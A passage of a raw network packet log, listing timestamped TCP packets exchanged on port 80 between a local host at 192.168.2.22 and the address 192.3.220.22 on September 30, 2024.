                                                                            Sep 30, 2024 09:53:34.775567055 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775578022 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775583982 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775593996 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775618076 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775618076 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775618076 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775635958 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775777102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775788069 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775799990 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775827885 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775837898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775856018 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775866985 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775876999 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775888920 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775890112 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775907993 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775924921 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775947094 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775958061 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775969028 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775990009 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776001930 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776161909 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776173115 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776184082 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776206970 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776221991 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776258945 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776269913 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776279926 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776289940 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776302099 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776312113 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776319027 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776330948 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776331902 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776350975 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776366949 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776516914 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776535988 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776545048 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776562929 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776576996 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776659966 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776675940 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776688099 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776700974 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776705027 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776719093 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776732922 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776741982 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776752949 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776777983 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776778936 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776784897 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776796103 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.776818991 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.776853085 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780411959 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780422926 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780432940 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780463934 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780476093 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780483961 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780493975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780500889 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780505896 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780527115 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780539989 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780558109 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780576944 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780587912 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780591011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780599117 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780606985 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780611038 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780622005 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780622959 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780632019 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780642033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780643940 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780653000 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780658007 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780675888 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780726910 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780726910 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780807972 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780818939 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780828953 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780839920 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780850887 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780858994 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780863047 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.780873060 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780884981 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.780900002 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781258106 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781269073 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781280994 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781300068 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781311989 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781320095 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781330109 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781342030 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781358004 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781358957 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781371117 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781371117 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781380892 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.781384945 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781399012 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.781416893 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862617016 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862629890 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862639904 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862657070 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862668037 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862679005 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862679958 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862690926 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862692118 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862708092 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862721920 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862737894 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862770081 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862932920 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862943888 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862955093 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862965107 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862976074 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862982035 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862987041 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.862994909 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.862998009 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863008976 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863009930 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863019943 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863019943 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863035917 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863042116 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863048077 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863049984 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863063097 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863075972 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863082886 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863091946 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863101959 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863118887 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863120079 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863126993 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863145113 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863156080 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863287926 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863298893 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863310099 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863321066 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863332033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863339901 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863353968 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863365889 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863442898 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863454103 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863465071 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863475084 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863485098 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863488913 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863497972 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863501072 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863509893 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863518000 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863522053 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863533020 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863534927 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863542080 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863548040 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863553047 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863564014 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863584042 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863590002 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863600016 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863610983 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863624096 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863626957 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863636971 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863645077 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863647938 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863657951 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863660097 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863667965 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863677025 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863679886 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863689899 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863696098 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863708019 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863727093 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.863945961 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863956928 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863967896 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.863992929 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864002943 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864049911 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864062071 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864073038 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864084005 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864094019 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864105940 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864114046 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864119053 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864130020 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864140987 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864151001 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864155054 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864166021 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864183903 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864248037 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864259005 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864269972 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864300013 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864315033 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864368916 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864381075 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864391088 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864402056 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864418983 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864433050 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864511013 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864526987 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864537001 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864547014 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864553928 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864562035 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864568949 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864573002 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864584923 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864593029 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864612103 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864701986 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864712000 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864722013 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864732027 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864742041 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864747047 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864754915 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864757061 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864765882 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864775896 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864785910 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864794970 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864806890 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864815950 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864815950 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864816904 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864816904 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864818096 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.864834070 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.864845037 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865144968 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865176916 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865190029 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865194082 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865209103 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865210056 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865221024 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865225077 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865232944 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865243912 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865245104 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865255117 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865273952 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865478039 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865488052 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865499020 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865509033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865531921 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865533113 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865540028 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865544081 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865555048 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865561008 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865566015 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865575075 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865576982 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865587950 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865595102 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865598917 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865607977 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865609884 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865621090 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865622044 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.865642071 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.865658998 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950315952 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950337887 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950349092 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950360060 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950376034 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950387001 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950397015 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950407028 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950417042 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950426102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950436115 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950445890 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950450897 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950455904 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950500011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950515032 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950524092 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950534105 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950535059 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950544119 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950547934 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950553894 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950563908 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950568914 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950578928 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.950583935 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.950588942 CEST8049167192.3.220.22192.168.2.22
